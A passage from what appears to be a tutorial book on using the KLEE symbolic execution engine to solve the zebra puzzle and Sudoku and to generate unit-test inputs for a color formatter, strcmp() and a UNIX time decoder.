Wejustdefineallvariablesandaddconstraints:
int main()
{
int Yellow, Blue, Red, Ivory, Green;
int Norwegian, Ukrainian, Englishman, Spaniard, Japanese;
int Water, Tea, Milk, OrangeJuice, Coffee;
int Kools, Chesterfield, OldGold, LuckyStrike, Parliament;
int Fox, Horse, Snails, Dog, Zebra;
klee_make_symbolic(&Yellow, sizeof(int), "Yellow");
klee_make_symbolic(&Blue, sizeof(int), "Blue");
klee_make_symbolic(&Red, sizeof(int), "Red");
klee_make_symbolic(&Ivory, sizeof(int), "Ivory");
klee_make_symbolic(&Green, sizeof(int), "Green");
klee_make_symbolic(&Norwegian, sizeof(int), "Norwegian");
klee_make_symbolic(&Ukrainian, sizeof(int), "Ukrainian");
klee_make_symbolic(&Englishman, sizeof(int), "Englishman");
klee_make_symbolic(&Spaniard, sizeof(int), "Spaniard");
klee_make_symbolic(&Japanese, sizeof(int), "Japanese");
klee_make_symbolic(&Water, sizeof(int), "Water");
klee_make_symbolic(&Tea, sizeof(int), "Tea");
klee_make_symbolic(&Milk, sizeof(int), "Milk");
klee_make_symbolic(&OrangeJuice, sizeof(int), "OrangeJuice");
klee_make_symbolic(&Coffee, sizeof(int), "Coffee");
klee_make_symbolic(&Kools, sizeof(int), "Kools");
klee_make_symbolic(&Chesterfield, sizeof(int), "Chesterfield");
klee_make_symbolic(&OldGold, sizeof(int), "OldGold");
klee_make_symbolic(&LuckyStrike, sizeof(int), "LuckyStrike");
klee_make_symbolic(&Parliament, sizeof(int), "Parliament");
klee_make_symbolic(&Fox, sizeof(int), "Fox");
klee_make_symbolic(&Horse, sizeof(int), "Horse");
klee_make_symbolic(&Snails, sizeof(int), "Snails");
klee_make_symbolic(&Dog, sizeof(int), "Dog");
klee_make_symbolic(&Zebra, sizeof(int), "Zebra");
// limits.
if (Yellow<1 || Yellow>5) return 0;
if (Blue<1 || Blue>5) return 0;
if (Red<1 || Red>5) return 0;
if (Ivory<1 || Ivory>5) return 0;
if (Green<1 || Green>5) return 0;
if (Norwegian<1 || Norwegian>5) return 0;
if (Ukrainian<1 || Ukrainian>5) return 0;
if (Englishman<1 || Englishman>5) return 0;
if (Spaniard<1 || Spaniard>5) return 0;
if (Japanese<1 || Japanese>5) return 0;
if (Water<1 || Water>5) return 0;
if (Tea<1 || Tea>5) return 0;
77
if (Milk<1 || Milk>5) return 0;
if (OrangeJuice<1 || OrangeJuice>5) return 0;
if (Coffee<1 || Coffee>5) return 0;
if (Kools<1 || Kools>5) return 0;
if (Chesterfield<1 || Chesterfield>5) return 0;
if (OldGold<1 || OldGold>5) return 0;
if (LuckyStrike<1 || LuckyStrike>5) return 0;
if (Parliament<1 || Parliament>5) return 0;
if (Fox<1 || Fox>5) return 0;
if (Horse<1 || Horse>5) return 0;
if (Snails<1 || Snails>5) return 0;
if (Dog<1 || Dog>5) return 0;
if (Zebra<1 || Zebra>5) return 0;
// colors are distinct for all 5 houses:
if (((1<<Yellow) | (1<<Blue) | (1<<Red) | (1<<Ivory) | (1<<Green))!=0x3E) return 0; // 111110
// all nationalities are living in different houses:
if (((1<<Norwegian) | (1<<Ukrainian) | (1<<Englishman) | (1<<Spaniard) | (1<<Japanese))!=0x3E) return 0;
// 111110
// so are beverages:
if (((1<<Water) | (1<<Tea) | (1<<Milk) | (1<<OrangeJuice) | (1<<Coffee))!=0x3E) return 0; // 111110
// so are cigarettes:
if (((1<<Kools) | (1<<Chesterfield) | (1<<OldGold) | (1<<LuckyStrike) | (1<<Parliament))!=0x3E) return
0; // 111110
// so are pets:
if (((1<<Fox) | (1<<Horse) | (1<<Snails) | (1<<Dog) | (1<<Zebra))!=0x3E) return 0; // 111110
// main constraints of the puzzle:
// 2.The Englishman lives in the red house.
if (Englishman!=Red) return 0;
// 3.The Spaniard owns the dog.
if (Spaniard!=Dog) return 0;
// 4.Coffee is drunk in the green house.
if (Coffee!=Green) return 0;
// 5.The Ukrainian drinks tea.
if (Ukrainian!=Tea) return 0;
// 6.The green house is immediately to the right of the ivory house.
if (Green!=Ivory+1) return 0;
// 7.The Old Gold smoker owns snails.
if (OldGold!=Snails) return 0;
// 8.Kools are smoked in the yellow house.
if (Kools!=Yellow) return 0;
// 9.Milk is drunk in the middle house.
if (Milk!=3) return 0; // i.e., 3rd house
// 10.The Norwegian lives in the first house.
if (Norwegian!=1) return 0;
// 11.The man who smokes Chesterfields lives in the house next to the man with the fox.
if (Chesterfield!=Fox+1 && Chesterfield!=Fox-1) return 0; // left or right
// 12.Kools are smoked in the house next to the house where the horse is kept.
if (Kools!=Horse+1 && Kools!=Horse-1) return 0; // left or right
// 13.The Lucky Strike smoker drinks orange juice.
if (LuckyStrike!=OrangeJuice) return 0;
// 14.The Japanese smokes Parliaments.
if (Japanese!=Parliament) return 0;
// 15.The Norwegian lives next to the blue house.
if (Norwegian!=Blue+1 && Norwegian!=Blue-1) return 0; // left or right
78
// all constraints are satisfied at this point
// force KLEE to produce .err file:
klee_assert(0);
return 0;
};
IforceKLEEtofinddistinctvaluesforcolors,nationalities,cigarettes,etc,inthesamewayasIdidfor
Sudokuearlier( 5.5).
Let’srunit:
% clang -emit-llvm -c -g klee_zebra1.c
...
% klee klee_zebra1.bc
KLEE: output directory is "/home/klee/klee-out-97"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_zebra1.c:130: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 761
KLEE: done: completed paths = 55
KLEE: done: generated tests = 55
Itworksfor 7secondsonmyIntelCorei3-3110M2.4GHznotebook.Let’sfindoutpath,where klee_assert()
hasbeenexecuted:
% ls klee-last | grep err
test000051.external.err
% ktest-tool --write-ints klee-last/test000051.ktest | less
ktest file : 'klee-last/test000051.ktest'
args : ['klee_zebra1.bc']
num objects: 25
object 0: name: b'Yellow'
object 0: size: 4
object 0: data: 1
object 1: name: b'Blue'
object 1: size: 4
object 1: data: 2
object 2: name: b'Red'
object 2: size: 4
object 2: data: 3
object 3: name: b'Ivory'
object 3: size: 4
object 3: data: 4
...
object 21: name: b'Horse'
object 21: size: 4
object 21: data: 2
object 22: name: b'Snails'
object 22: size: 4
object 22: data: 3
object 23: name: b'Dog'
object 23: size: 4
object 23: data: 4
object 24: name: b'Zebra'
object 24: size: 4
object 24: data: 5
Thisisindeedcorrectsolution.
klee_assume() alsocanbeusedthistime:
int main()
{
int Yellow, Blue, Red, Ivory, Green;
int Norwegian, Ukrainian, Englishman, Spaniard, Japanese;
int Water, Tea, Milk, OrangeJuice, Coffee;
int Kools, Chesterfield, OldGold, LuckyStrike, Parliament;
79
int Fox, Horse, Snails, Dog, Zebra;
klee_make_symbolic(&Yellow, sizeof(int), "Yellow");
klee_make_symbolic(&Blue, sizeof(int), "Blue");
klee_make_symbolic(&Red, sizeof(int), "Red");
klee_make_symbolic(&Ivory, sizeof(int), "Ivory");
klee_make_symbolic(&Green, sizeof(int), "Green");
klee_make_symbolic(&Norwegian, sizeof(int), "Norwegian");
klee_make_symbolic(&Ukrainian, sizeof(int), "Ukrainian");
klee_make_symbolic(&Englishman, sizeof(int), "Englishman");
klee_make_symbolic(&Spaniard, sizeof(int), "Spaniard");
klee_make_symbolic(&Japanese, sizeof(int), "Japanese");
klee_make_symbolic(&Water, sizeof(int), "Water");
klee_make_symbolic(&Tea, sizeof(int), "Tea");
klee_make_symbolic(&Milk, sizeof(int), "Milk");
klee_make_symbolic(&OrangeJuice, sizeof(int), "OrangeJuice");
klee_make_symbolic(&Coffee, sizeof(int), "Coffee");
klee_make_symbolic(&Kools, sizeof(int), "Kools");
klee_make_symbolic(&Chesterfield, sizeof(int), "Chesterfield");
klee_make_symbolic(&OldGold, sizeof(int), "OldGold");
klee_make_symbolic(&LuckyStrike, sizeof(int), "LuckyStrike");
klee_make_symbolic(&Parliament, sizeof(int), "Parliament");
klee_make_symbolic(&Fox, sizeof(int), "Fox");
klee_make_symbolic(&Horse, sizeof(int), "Horse");
klee_make_symbolic(&Snails, sizeof(int), "Snails");
klee_make_symbolic(&Dog, sizeof(int), "Dog");
klee_make_symbolic(&Zebra, sizeof(int), "Zebra");
// limits.
klee_assume (Yellow>=1 && Yellow<=5);
klee_assume (Blue>=1 && Blue<=5);
klee_assume (Red>=1 && Red<=5);
klee_assume (Ivory>=1 && Ivory<=5);
klee_assume (Green>=1 && Green<=5);
klee_assume (Norwegian>=1 && Norwegian<=5);
klee_assume (Ukrainian>=1 && Ukrainian<=5);
klee_assume (Englishman>=1 && Englishman<=5);
klee_assume (Spaniard>=1 && Spaniard<=5);
klee_assume (Japanese>=1 && Japanese<=5);
klee_assume (Water>=1 && Water<=5);
klee_assume (Tea>=1 && Tea<=5);
klee_assume (Milk>=1 && Milk<=5);
klee_assume (OrangeJuice>=1 && OrangeJuice<=5);
klee_assume (Coffee>=1 && Coffee<=5);
klee_assume (Kools>=1 && Kools<=5);
klee_assume (Chesterfield>=1 && Chesterfield<=5);
klee_assume (OldGold>=1 && OldGold<=5);
klee_assume (LuckyStrike>=1 && LuckyStrike<=5);
klee_assume (Parliament>=1 && Parliament<=5);
klee_assume (Fox>=1 && Fox<=5);
klee_assume (Horse>=1 && Horse<=5);
klee_assume (Snails>=1 && Snails<=5);
klee_assume (Dog>=1 && Dog<=5);
klee_assume (Zebra>=1 && Zebra<=5);
// colors are distinct for all 5 houses:
klee_assume (((1<<Yellow) | (1<<Blue) | (1<<Red) | (1<<Ivory) | (1<<Green))==0x3E); // 111110
// all nationalities are living in different houses:
klee_assume (((1<<Norwegian) | (1<<Ukrainian) | (1<<Englishman) | (1<<Spaniard) | (1<<Japanese))==0x3E);
// 111110
// so are beverages:
klee_assume (((1<<Water) | (1<<Tea) | (1<<Milk) | (1<<OrangeJuice) | (1<<Coffee))==0x3E); // 111110
// so are cigarettes:
klee_assume (((1<<Kools) | (1<<Chesterfield) | (1<<OldGold) | (1<<LuckyStrike) | (1<<Parliament))==0x3E)
; // 111110
80
// so are pets:
klee_assume (((1<<Fox) | (1<<Horse) | (1<<Snails) | (1<<Dog) | (1<<Zebra))==0x3E); // 111110
// main constraints of the puzzle:
// 2.The Englishman lives in the red house.
klee_assume (Englishman==Red);
// 3.The Spaniard owns the dog.
klee_assume (Spaniard==Dog);
// 4.Coffee is drunk in the green house.
klee_assume (Coffee==Green);
// 5.The Ukrainian drinks tea.
klee_assume (Ukrainian==Tea);
// 6.The green house is immediately to the right of the ivory house.
klee_assume (Green==Ivory+1);
// 7.The Old Gold smoker owns snails.
klee_assume (OldGold==Snails);
// 8.Kools are smoked in the yellow house.
klee_assume (Kools==Yellow);
// 9.Milk is drunk in the middle house.
klee_assume (Milk==3); // i.e., 3rd house
// 10.The Norwegian lives in the first house.
klee_assume (Norwegian==1);
// 11.The man who smokes Chesterfields lives in the house next to the man with the fox.
klee_assume (Chesterfield==Fox+1 || Chesterfield==Fox-1); // left or right
// 12.Kools are smoked in the house next to the house where the horse is kept.
klee_assume (Kools==Horse+1 || Kools==Horse-1); // left or right
// 13.The Lucky Strike smoker drinks orange juice.
klee_assume (LuckyStrike==OrangeJuice);
// 14.The Japanese smokes Parliaments.
klee_assume (Japanese==Parliament);
// 15.The Norwegian lives next to the blue house.
klee_assume (Norwegian==Blue+1 || Norwegian==Blue-1); // left or right
// all constraints are satisfied at this point
// force KLEE to produce .err file:
klee_assert(0);
};
...andthisversionworksslightlyfaster( 5seconds),maybebecauseKLEEisawareofthis intrinsicand
handlesitinaspecialway?
9.4 Sudoku
I’vealsorewrittenSudokuexample( 5.5)forKLEE:
1#include <stdint.h>
2
3/*
4coordinates:
5------------------------------
600 01 02 | 03 04 05 | 06 07 08
710 11 12 | 13 14 15 | 16 17 18
820 21 22 | 23 24 25 | 26 27 28
9------------------------------
10 30 31 32 | 33 34 35 | 36 37 38
11 40 41 42 | 43 44 45 | 46 47 48
12 50 51 52 | 53 54 55 | 56 57 58
13 ------------------------------
14 60 61 62 | 63 64 65 | 66 67 68
81
15 70 71 72 | 73 74 75 | 76 77 78
16 80 81 82 | 83 84 85 | 86 87 88
17 ------------------------------
18 */
19
20 uint8_t cells[9][9];
21
22 // http://www.norvig.com/sudoku.html
23 // http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
24 char *puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97..";
25
26 int main()
27 {
28 klee_make_symbolic(cells, sizeof cells, "cells");
29
30 // process text line:
31 for (int row=0; row<9; row++)
32 for (int column=0; column<9; column++)
33 {
34 char c=puzzle[row*9 + column];
35 if (c!='.')
36 {
37 if (cells[row][column]!=c-'0') return 0;
38 }
39 else
40 {
41 // limit cells values to 1..9:
42 if (cells[row][column]<1) return 0;
43 if (cells[row][column]>9) return 0;
44 };
45 };
46
47 // for all 9 rows
48 for (int row=0; row<9; row++)
49 {
50
51 if (((1<<cells[row][0]) |
52 (1<<cells[row][1]) |
53 (1<<cells[row][2]) |
54 (1<<cells[row][3]) |
55 (1<<cells[row][4]) |
56 (1<<cells[row][5]) |
57 (1<<cells[row][6]) |
58 (1<<cells[row][7]) |
59 (1<<cells[row][8]))!=0x3FE ) return 0; // 11 1111 1110
60 };
61
62 // for all 9 columns
63 for (int c=0; c<9; c++)
64 {
65 if (((1<<cells[0][c]) |
66 (1<<cells[1][c]) |
67 (1<<cells[2][c]) |
68 (1<<cells[3][c]) |
69 (1<<cells[4][c]) |
70 (1<<cells[5][c]) |
71 (1<<cells[6][c]) |
72 (1<<cells[7][c]) |
73 (1<<cells[8][c]))!=0x3FE ) return 0; // 11 1111 1110
74 };
75
76 // enumerate all 9 squares
77 for (int r=0; r<9; r+=3)
78 for (int c=0; c<9; c+=3)
79 {
80 // add constraints for each 3*3 square:
81 if ((1<<cells[r+0][c+0] |
82 1<<cells[r+0][c+1] |
83 1<<cells[r+0][c+2] |
84 1<<cells[r+1][c+0] |
85 1<<cells[r+1][c+1] |
86 1<<cells[r+1][c+2] |
87 1<<cells[r+2][c+0] |
88 1<<cells[r+2][c+1] |
89 1<<cells[r+2][c+2])!=0x3FE ) return 0; // 11 1111 1110
90 };
82
91
92 // at this point, all constraints must be satisfied
93 klee_assert(0);
94 };
Let’srunit:
% clang -emit-llvm -c -g klee_sudoku_or1.c
...
\$ time klee klee_sudoku_or1.bc
KLEE: output directory is "/home/klee/klee-out-98"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_sudoku_or1.c:93: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 7512
KLEE: done: completed paths = 161
KLEE: done: generated tests = 161
real 3m44.111s
user 3m43.319s
sys 0m0.951s
Nowthisisreallyslower(onmyIntelCorei3-3110M2.4GHznotebook)incomparisontoZ3Pysolution
(5.5).
Buttheansweriscorrect:
% ls klee-last | grep err
test000161.external.err
% ktest-tool --write-ints klee-last/test000161.ktest
ktest file : 'klee-last/test000161.ktest'
args : ['klee_sudoku_or1.bc']
num objects: 1
object 0: name: b'cells'
object 0: size: 81
object 0: data: b'\x01\x04\x05\x03\x02\x07\x06\t\x08\x08\x03\t\x06\x05\x04\x01\x02\x07\x06\x07\x02\t\x01\x08\
x05\x04\x03\x04\t\x06\x01\x08\x05\x03\x07\x02\x02\x01\x08\x04\x07\x03\t\x05\x06\x07\x05\x03\x02\t\x06\x04\
x08\x01\x03\x06\x07\x05\x04\x02\x08\x01\t\t\x08\x04\x07\x06\x01\x02\x03\x05\x05\x02\x01\x08\x03\t\x07\x06\
x04'
Character \thascodeof9inC/C++,andKLEEprintsbytearrayasaC/C++string,soitshowssome
valuesinsuchway.Wecanjustkeepinmindthatthereis9attheeachplacewherewesee \t.Thesolution,
whilenotproperlyformatted,correctindeed.
Bytheway,atlines42and43youmayseehowwetelltoKLEEthatallarrayelementsmustbewithin
somelimits. Ifwecommenttheselinesout,we’vegotthis:
% time klee klee_sudoku_or1.bc
KLEE: output directory is "/home/klee/klee-out-100"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: ERROR: /home/klee/klee_sudoku_or1.c:51: overshift error
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_sudoku_or1.c:51: overshift error
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_sudoku_or1.c:51: overshift error
KLEE: NOTE: now ignoring this error at this location
...
KLEEwarnsusthatshiftvalueatline51istoobig.Indeed,KLEEmaytryallbytevaluesupto255(0xFF),
whicharepointlesstousethere,andmaybeasymptomoferrororbug,soKLEEwarnsaboutit.
Nowlet’suse klee_assume() again:
#include <stdint.h>
/*
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
83
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
*/
uint8_t cells[9][9];
// http://www.norvig.com/sudoku.html
// http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
char *puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97..";
int main()
{
klee_make_symbolic(cells, sizeof cells, "cells");
// process text line:
for (int row=0; row<9; row++)
for (int column=0; column<9; column++)
{
char c=puzzle[row*9 + column];
if (c!='.')
klee_assume (cells[row][column]==c-'0');
else
{
klee_assume (cells[row][column]>=1);
klee_assume (cells[row][column]<=9);
};
};
// for all 9 rows
for (int row=0; row<9; row++)
{
klee_assume (((1<<cells[row][0]) |
(1<<cells[row][1]) |
(1<<cells[row][2]) |
(1<<cells[row][3]) |
(1<<cells[row][4]) |
(1<<cells[row][5]) |
(1<<cells[row][6]) |
(1<<cells[row][7]) |
(1<<cells[row][8]))==0x3FE ); // 11 1111 1110
};
// for all 9 columns
for (int c=0; c<9; c++)
{
klee_assume (((1<<cells[0][c]) |
(1<<cells[1][c]) |
(1<<cells[2][c]) |
(1<<cells[3][c]) |
(1<<cells[4][c]) |
(1<<cells[5][c]) |
(1<<cells[6][c]) |
(1<<cells[7][c]) |
(1<<cells[8][c]))==0x3FE ); // 11 1111 1110
};
// enumerate all 9 squares
for (int r=0; r<9; r+=3)
for (int c=0; c<9; c+=3)
{
// add constraints for each 3*3 square:
klee_assume ((1<<cells[r+0][c+0] |
1<<cells[r+0][c+1] |
1<<cells[r+0][c+2] |
1<<cells[r+1][c+0] |
1<<cells[r+1][c+1] |
84
1<<cells[r+1][c+2] |
1<<cells[r+2][c+0] |
1<<cells[r+2][c+1] |
1<<cells[r+2][c+2])==0x3FE ); // 11 1111 1110
};
// at this point, all constraints must be satisfied
klee_assert(0);
};
% time klee klee_sudoku_or2.bc
KLEE: output directory is "/home/klee/klee-out-99"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_sudoku_or2.c:93: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 7119
KLEE: done: completed paths = 1
KLEE: done: generated tests = 1
real 0m35.312s
user 0m34.945s
sys 0m0.318s
Thatworksmuchfaster: perhapsKLEEindeedhandlethis intrinsicinaspecialway. And,aswesee,the
onlyonepathhasbeenfound(oneweactuallyinterestinginit)insteadof161.
It’sstillmuchslowerthanZ3Pysolution,though.
9.5 Unit test: HTML/CSS color
ThemostpopularwaystorepresentHTML/CSScolorisbyEnglishname(e.g.,“red”)andby6-digithexadec-
imalnumber(e.g.,“#0077CC”).Thereisthird,lesspopularway: ifeachbyteinhexadecimalnumberhas
twodoublingdigits,itcanbe abbreviated,thus,“#0077CC”canbewrittenjustas“#07C”.
Let’swriteafunctiontoconvert3colorcomponentsintoname(ifpossible,firstpriority),3-digithexadec-
imalform(ifpossible,secondpriority),oras6-digithexadecimalform(asalastresort).
#include <string.h>
#include <stdio.h>
#include <stdint.h>
void HTML_color(uint8_t R, uint8_t G, uint8_t B, char* out)
{
if (R==0xFF && G==0 && B==0)
{
strcpy (out, "red");
return;
};
if (R==0x0 && G==0xFF && B==0)
{
strcpy (out, "green");
return;
};
if (R==0 && G==0 && B==0xFF)
{
strcpy (out, "blue");
return;
};
// abbreviated hexadecimal
if (R>>4==(R&0xF) && G>>4==(G&0xF) && B>>4==(B&0xF))
{
sprintf (out, "#%X%X%X", R&0xF, G&0xF, B&0xF);
return;
};
// last resort
sprintf (out, "#%02X%02X%02X", R, G, B);
};
85
int main()
{
uint8_t R, G, B;
klee_make_symbolic (&R, sizeof R, "R");
klee_make_symbolic (&G, sizeof R, "G");
klee_make_symbolic (&B, sizeof R, "B");
char tmp[16];
HTML_color(R, G, B, tmp);
};
Thereare5possiblepathsinfunction,andlet’ssee,ifKLEEcouldfindthemall? It’sindeedso:
% clang -emit-llvm -c -g color.c
% klee color.bc
KLEE: output directory is "/home/klee/klee-out-134"
KLEE: WARNING: undefined reference to function: sprintf
KLEE: WARNING: undefined reference to function: strcpy
KLEE: WARNING ONCE: calling external: strcpy(51867584, 51598960)
KLEE: ERROR: /home/klee/color.c:33: external call with symbolic argument: sprintf
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/color.c:28: external call with symbolic argument: sprintf
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 479
KLEE: done: completed paths = 19
KLEE: done: generated tests = 5
Wecanignorecallstostrcpy()andsprintf(),becausewearenotreallyinterestinginstateof outvariable.
Sothereareexactly5paths:
% ls klee-last
assembly.ll run.stats test000003.ktest test000005.ktest
info test000001.ktest test000003.pc test000005.pc
messages.txt test000002.ktest test000004.ktest warnings.txt
run.istats test000003.exec.err test000005.exec.err
1stsetofinputvariableswillresultin“red”string:
% ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\xff'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x00'
2ndsetofinputvariableswillresultin“green”string:
% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\x00'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\xff'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x00'
3rdsetofinputvariableswillresultin“#010000”string:
% ktest-tool --write-ints klee-last/test000003.ktest
ktest file : 'klee-last/test000003.ktest'
args : ['color.bc']
86
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\x01'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x00'
4thsetofinputvariableswillresultin“blue”string:
% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\x00'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\xff'
5thsetofinputvariableswillresultin“#F01”string:
% ktest-tool --write-ints klee-last/test000005.ktest
ktest file : 'klee-last/test000005.ktest'
args : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\xff'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x11'
These5setsofinputvariablescanformaunittestforourfunction.
9.6 Unit test: strcmp() function
Thestandard strcmp()functionfromClibrarycanreturn0,-1or1,dependingofcomparisonresult.
Hereismyownimplementationof strcmp():
int my_strcmp(const char *s1, const char *s2)
{
int ret = 0;
while (1)
{
ret = *(unsigned char *) s1 - *(unsigned char *) s2;
if (ret!=0)
break;
if ((*s1==0) || (*s2)==0)
break;
s1++;
s2++;
};
if (ret < 0)
{
return -1;
} else if (ret > 0)
{
return 1;
}
87
return 0;
}
int main()
{
char input1[2];
char input2[2];
klee_make_symbolic(input1, sizeof input1, "input1");
klee_make_symbolic(input2, sizeof input2, "input2");
klee_assume((input1[0]>='a') && (input1[0]<='z'));
klee_assume((input2[0]>='a') && (input2[0]<='z'));
klee_assume(input1[1]==0);
klee_assume(input2[1]==0);
my_strcmp (input1, input2);
};
Let’sfindout,ifKLEEiscapableoffindingallthreepaths? IintentionalymadethingssimplerforKLEEby
limitinginputarraystotwo2bytesorto1character+terminalzerobyte.
% clang -emit-llvm -c -g strcmp.c
% klee strcmp.bc
KLEE: output directory is "/home/klee/klee-out-131"
KLEE: ERROR: /home/klee/strcmp.c:35: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/strcmp.c:36: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 137
KLEE: done: completed paths = 5
KLEE: done: generated tests = 5
% ls klee-last
assembly.ll run.stats test000002.ktest test000004.ktest
info test000001.ktest test000002.pc test000005.ktest
messages.txt test000001.pc test000002.user.err warnings.txt
run.istats test000001.user.err test000003.ktest
Thefirsttwoerrorsareabout klee_assume() . Theseareinputvaluesonwhich klee_assume() calls
arestuck. Wecanignorethem,ortakeapeekoutofcuriosity:
% ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'\x00\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'\x00\x00'
% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'a\xff'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'\x00\x00'
Threerestfilesaretheinputvaluesforeachpathinsideofmyimplementationof strcmp():
% ktest-tool --write-ints klee-last/test000003.ktest
ktest file : 'klee-last/test000003.ktest'
args : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
88
object 0: data: b'b\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'c\x00'
% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'c\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'a\x00'
% ktest-tool --write-ints klee-last/test000005.ktest
ktest file : 'klee-last/test000005.ktest'
args : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'a\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'a\x00'
3rdisaboutfirstargument(“b”)islesserthanthesecond(“c”).4thisopposite(“c”and“a”).5thiswhen
theyareequal(“a”and“a”).
Usingthese3testcases,we’vegotfullcoverageofourimplementationof strcmp().
9.7 UNIX date/time
UNIXdate/time76isanumberofsecondsthathaveelapsedsince1-Jan-197000:00UTC.C/C++gmtime()
functionisusedtodecodethisvalueintohuman-readabledate/time.
HereisapieceofcodeI’vecopypastedfromsomeancientversionofMinixOS( http://www.cise.ufl.
edu/~cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/gmtime.c )andreworkedslightly:
1#include <stdint.h>
2#include <time.h>
3#include <assert.h>
4
5/*
6 * copypasted and reworked from
7 * http://www.cise.ufl.edu/ cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/loc_time.h
8 * http://www.cise.ufl.edu/ cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/misc.c
9 * http://www.cise.ufl.edu/ cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/gmtime.c
10 */
11
12 #define YEAR0 1900
13 #define EPOCH_YR 1970
14 #define SECS_DAY (24L * 60L * 60L)
15 #define YEARSIZE(year) (LEAPYEAR(year) ? 366 : 365)
16
17 const int _ytab[2][12] =
18 {
19 { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 },
20 { 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 }
21 };
22
23 const char *_days[] =
24 {
25 "Sunday", "Monday", "Tuesday", "Wednesday",
26 "Thursday", "Friday", "Saturday"
27 };
28
29 const char *_months[] =
30 {
31 "January", "February", "March",
32 "April", "May", "June",
33 "July", "August", "September",
76https://en.wikipedia.org/wiki/Unix_time
89
34 "October", "November", "December"
35 };
36
37 #define LEAPYEAR(year) (!((year) % 4) && (((year) % 100) || !((year) % 400)))
38
39 void decode_UNIX_time(const time_t time)
40 {
41 unsigned int dayclock, dayno;
42 int year = EPOCH_YR;
43
44 dayclock = (unsigned long)time % SECS_DAY;
45 dayno = (unsigned long)time / SECS_DAY;
46
47 int seconds = dayclock % 60;
48 int minutes = (dayclock % 3600) / 60;
49 int hour = dayclock / 3600;
50 int wday = (dayno + 4) % 7;
51 while (dayno >= YEARSIZE(year))
52 {
53 dayno -= YEARSIZE(year);
54 year++;
55 }
56
57 year = year - YEAR0;
58
59 int month = 0;
60
61 while (dayno >= _ytab[LEAPYEAR(year)][month])
62 {
63 dayno -= _ytab[LEAPYEAR(year)][month];
64 month++;
65 }
66
67 char *s;
68 switch (month)
69 {
70 case 0: s="January"; break;
71 case 1: s="February"; break;
72 case 2: s="March"; break;
73 case 3: s="April"; break;
74 case 4: s="May"; break;
75 case 5: s="June"; break;
76 case 6: s="July"; break;
